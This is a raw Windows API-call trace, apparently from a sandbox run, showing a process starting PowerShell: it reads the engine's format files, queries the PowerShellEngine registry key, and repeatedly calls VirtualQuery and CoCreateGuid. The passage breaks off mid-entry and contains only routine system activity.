[0029.488] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.488] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.488] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xa451b806, Data2=0x5f2b, Data3=0x432d, Data4=([0]=0xa6, [1]=0x62, [2]=0xb2, [3]=0x14, [4]=0x44, [5]=0x21, [6]=0xdc, [7]=0x9e))) returned 0x0 [0029.489] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x8609ea9f, Data2=0x7405, Data3=0x4b47, Data4=([0]=0x91, [1]=0xee, [2]=0x5, [3]=0xcf, [4]=0x87, [5]=0x6e, [6]=0xa3, [7]=0xd7))) returned 0x0 [0029.489] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x2201aca6, Data2=0xdc0, Data3=0x4972, Data4=([0]=0xa6, [1]=0xdb, [2]=0xdc, [3]=0xd5, [4]=0x86, [5]=0xf0, [6]=0xec, [7]=0x7c))) returned 0x0 [0029.489] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x563f5437, Data2=0xded3, Data3=0x4e22, Data4=([0]=0x9c, [1]=0x2a, [2]=0xbc, [3]=0xe2, [4]=0x1a, [5]=0x31, [6]=0x1d, [7]=0xb0))) returned 0x0 [0029.489] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.489] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x157f5cd0, Data2=0xbc2e, Data3=0x4ae9, Data4=([0]=0xb1, [1]=0xb7, [2]=0xba, [3]=0xb5, [4]=0x69, [5]=0xd5, [6]=0x4e, [7]=0x68))) returned 0x0 [0029.489] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.489] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.490] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.490] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.491] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.491] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x1c275335, Data2=0x923d, Data3=0x41ef, Data4=([0]=0x9c, [1]=0x70, [2]=0x10, [3]=0x23, [4]=0x9, [5]=0x27, [6]=0x55, [7]=0x1))) returned 0x0 [0029.491] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x26d4a7d8, Data2=0x2f47, Data3=0x46db, Data4=([0]=0xb3, [1]=0xf7, [2]=0x7e, [3]=0x78, [4]=0x87, [5]=0x6e, [6]=0x91, [7]=0x75))) returned 0x0 [0029.491] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xf93e2256, Data2=0x2ab6, Data3=0x4a7a, Data4=([0]=0xa2, [1]=0x83, [2]=0xee, [3]=0x4f, [4]=0x31, [5]=0x7d, [6]=0xe5, [7]=0x54))) returned 0x0 [0029.491] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x6981244c, Data2=0x4301, Data3=0x4b7d, Data4=([0]=0x83, [1]=0x32, [2]=0xd0, [3]=0x8a, [4]=0x9a, [5]=0xa1, [6]=0x9c, [7]=0x71))) returned 0x0 [0029.491] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xd1102115, Data2=0x84ec, Data3=0x443f, Data4=([0]=0xa7, [1]=0xdc, [2]=0x4e, [3]=0xda, [4]=0xc4, [5]=0xba, [6]=0xf9, [7]=0xd8))) returned 0x0 [0029.492] VirtualQuery (in: lpAddress=0x24d534, lpBuffer=0x24e534, dwLength=0x1c | out: lpBuffer=0x24e534*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.492] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x70c086bb, Data2=0xc153, Data3=0x464a, Data4=([0]=0xb4, [1]=0x62, [2]=0xc5, [3]=0xa1, [4]=0x97, [5]=0x9d, [6]=0x74, [7]=0xd2))) returned 0x0 [0029.492] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x448b200c, Data2=0x6301, Data3=0x4f38, Data4=([0]=0xa4, [1]=0x23, [2]=0x5f, [3]=0x1c, [4]=0x5f, [5]=0x9a, [6]=0xe0, [7]=0xe4))) returned 0x0 [0029.492] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x787b557b, Data2=0x7daf, Data3=0x43a0, Data4=([0]=0xa1, [1]=0x96, [2]=0xa8, [3]=0xea, [4]=0x26, [5]=0x41, [6]=0xe2, [7]=0xa0))) returned 0x0 [0029.492] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x4faae35a, Data2=0x4d76, Data3=0x457e, Data4=([0]=0xa6, [1]=0x92, [2]=0x51, [3]=0x81, [4]=0xb1, [5]=0xbc, [6]=0x56, [7]=0x6b))) returned 0x0 [0029.492] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x479ce414, Data2=0x6e0b, Data3=0x4e3d, Data4=([0]=0x90, [1]=0x4e, [2]=0x20, [3]=0x52, [4]=0xd, [5]=0x92, [6]=0xba, [7]=0x63))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x392dec2b, Data2=0xb624, Data3=0x48ac, Data4=([0]=0xa3, [1]=0x1e, [2]=0xc5, [3]=0x4d, [4]=0x8e, [5]=0x4d, [6]=0x15, [7]=0x53))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3a9f27a0, Data2=0x36cb, Data3=0x4064, Data4=([0]=0x85, [1]=0xc7, [2]=0x67, [3]=0x5f, [4]=0x56, [5]=0x3f, [6]=0x89, [7]=0x3f))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x8df43daf, Data2=0xb681, Data3=0x41f6, Data4=([0]=0xb4, [1]=0xbb, [2]=0x1f, [3]=0x4d, [4]=0xa7, [5]=0xd7, [6]=0xaa, [7]=0xc3))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xd3f040a2, Data2=0xc77, Data3=0x4976, Data4=([0]=0xa9, [1]=0xea, [2]=0xb8, [3]=0x8e, [4]=0x35, [5]=0x48, [6]=0x32, [7]=0x4b))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x60fe9cb5, Data2=0x22eb, Data3=0x4f65, Data4=([0]=0x88, [1]=0xc2, [2]=0xe4, [3]=0xc7, [4]=0x76, [5]=0xda, [6]=0xc1, [7]=0xe0))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xe848fd51, Data2=0x7e6a, Data3=0x40f2, Data4=([0]=0x94, [1]=0xf4, [2]=0x57, [3]=0xb6, [4]=0xfe, [5]=0x9a, [6]=0xcf, [7]=0x6b))) returned 0x0 [0029.493] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xeb9a7ee6, Data2=0xbfa3, Data3=0x465b, Data4=([0]=0xbe, [1]=0x4, [2]=0xf7, [3]=0x17, [4]=0x41, [5]=0xf5, [6]=0x4a, [7]=0x63))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x7ed96f2, Data2=0x5799, Data3=0x4855, Data4=([0]=0xaa, [1]=0x1, [2]=0x13, [3]=0x24, [4]=0x40, [5]=0xae, [6]=0x28, [7]=0x6c))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x961b79b6, Data2=0x9111, Data3=0x4379, Data4=([0]=0xa8, [1]=0x35, [2]=0xab, [3]=0x93, [4]=0x56, [5]=0xf, [6]=0x67, [7]=0x4c))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3b3a5063, Data2=0x9152, Data3=0x471f, Data4=([0]=0x9c, [1]=0x5d, [2]=0x53, [3]=0x88, [4]=0x2f, [5]=0x54, [6]=0xea, [7]=0x5e))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x6c0a21f3, Data2=0xe67, Data3=0x463b, Data4=([0]=0x8f, [1]=0x3c, [2]=0xae, [3]=0x20, [4]=0xa6, [5]=0xf6, [6]=0xa, [7]=0xcc))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xc9b647d8, Data2=0x9cd8, Data3=0x4b92, Data4=([0]=0x8f, [1]=0x9d, [2]=0x3c, [3]=0x14, [4]=0xbc, [5]=0x6c, [6]=0x1b, [7]=0xbf))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3c3f97ef, Data2=0xcd89, Data3=0x4fea, Data4=([0]=0xb6, [1]=0x20, [2]=0xd5, [3]=0x6, [4]=0x12, [5]=0xa3, [6]=0x82, [7]=0x90))) returned 0x0 [0029.494] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb32aae61, Data2=0x4f19, Data3=0x43c3, Data4=([0]=0x92, [1]=0xc4, [2]=0x41, [3]=0x63, [4]=0x2e, [5]=0x75, [6]=0x31, [7]=0x18))) returned 0x0 [0029.494] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.494] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.495] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.496] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xcf1d29bf, Data2=0x3480, Data3=0x433c, Data4=([0]=0xb8, [1]=0xcc, [2]=0x75, [3]=0x5, [4]=0xb3, [5]=0xb4, [6]=0xa2, [7]=0xdf))) returned 0x0 [0029.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0029.496] GetLastError () returned 0x0 [0029.496] SetErrorMode (uMode=0x1) returned 0x1 [0029.496] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.496] GetLastError () returned 0x0 [0029.496] GetFileType (hFile=0x300) returned 0x1 [0029.496] SetErrorMode (uMode=0x1) returned 0x1 [0029.496] GetFileType (hFile=0x300) returned 0x1 [0029.496] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.498] GetLastError () returned 0x0 [0029.498] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.499] GetLastError () returned 0x0 [0029.499] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.499] GetLastError () returned 0x0 [0029.499] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.499] GetLastError () returned 0x0 [0029.500] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.500] GetLastError () returned 0x0 [0029.500] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.500] GetLastError () returned 0x0 [0029.500] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x119, lpOverlapped=0x0) returned 1 [0029.500] GetLastError () returned 0x0 [0029.500] ReadFile (in: hFile=0x300, lpBuffer=0x2549828, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2549828*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.500] GetLastError () returned 0x0 [0029.500] CloseHandle (hObject=0x300) returned 1 [0029.500] GetLastError () returned 0x0 [0029.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0029.500] GetLastError () returned 0x0 [0029.500] SetErrorMode (uMode=0x1) returned 0x1 [0029.500] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x256a824 | out: lpFileInformation=0x256a824*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0029.500] GetLastError () returned 0x0 [0029.500] SetErrorMode (uMode=0x1) returned 0x1 [0029.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0029.500] GetLastError () returned 0x0 [0029.500] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.500] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.500] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.501] RegCloseKey (hKey=0x300) returned 0x0 [0029.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0029.501] GetLastError () returned 0x0 [0029.501] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0029.501] GetLastError () returned 0x0 [0029.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24dee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.502] GetLastError () returned 0x0 [0029.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.502] GetLastError () returned 0x0 [0029.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24de90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0029.502] GetLastError () returned 0x0 [0029.503] VirtualQuery (in: lpAddress=0x24d390, lpBuffer=0x24e390, dwLength=0x1c | out: lpBuffer=0x24e390*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.503] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xacaa22df, Data2=0x9304, Data3=0x4ff8, Data4=([0]=0xa6, [1]=0x1f, [2]=0xd8, [3]=0x1b, [4]=0xa4, [5]=0xa9, [6]=0x24, [7]=0x5e))) returned 0x0 [0029.503] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.503] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xab86372c, Data2=0x64b, Data3=0x4628, Data4=([0]=0x91, [1]=0x55, [2]=0xee, [3]=0x9, [4]=0x67, [5]=0x9c, [6]=0x6f, [7]=0x73))) returned 0x0 [0029.503] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x2115f1be, Data2=0xc594, Data3=0x4be0, Data4=([0]=0xb7, [1]=0x4c, [2]=0x5a, [3]=0xaa, [4]=0x3e, [5]=0xd3, [6]=0x3c, [7]=0x94))) returned 0x0 [0029.503] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x79983ad0, Data2=0x897d, Data3=0x42d0, Data4=([0]=0xb2, [1]=0xd4, [2]=0x35, [3]=0x15, [4]=0xf9, [5]=0xd0, [6]=0xab, [7]=0x24))) returned 0x0 [0029.503] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.504] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.504] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0029.504] GetLastError () returned 0x0 [0029.504] SetErrorMode (uMode=0x1) returned 0x1 [0029.504] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.504] GetLastError () returned 0x0 [0029.504] GetFileType (hFile=0x300) returned 0x1 [0029.504] SetErrorMode (uMode=0x1) returned 0x1 [0029.504] GetFileType (hFile=0x300) returned 0x1 [0029.504] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.506] GetLastError () returned 0x0 [0029.507] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.507] GetLastError () returned 0x0 [0029.507] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.507] GetLastError () returned 0x0 [0029.507] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.507] GetLastError () returned 0x0 [0029.508] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.508] GetLastError () returned 0x0 [0029.508] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.508] GetLastError () returned 0x0 [0029.508] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.508] GetLastError () returned 0x0 [0029.508] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.509] GetLastError () returned 0x0 [0029.510] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.510] GetLastError () returned 0x0 [0029.510] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.510] GetLastError () returned 0x0 [0029.510] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.510] GetLastError () returned 0x0 [0029.510] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.510] GetLastError () returned 0x0 [0029.510] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.511] GetLastError () returned 0x0 [0029.511] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x259384c*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.511] GetLastError () returned 0x0 [0029.511] ReadFile (in: hFile=0x300, lpBuffer=0x259384c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | 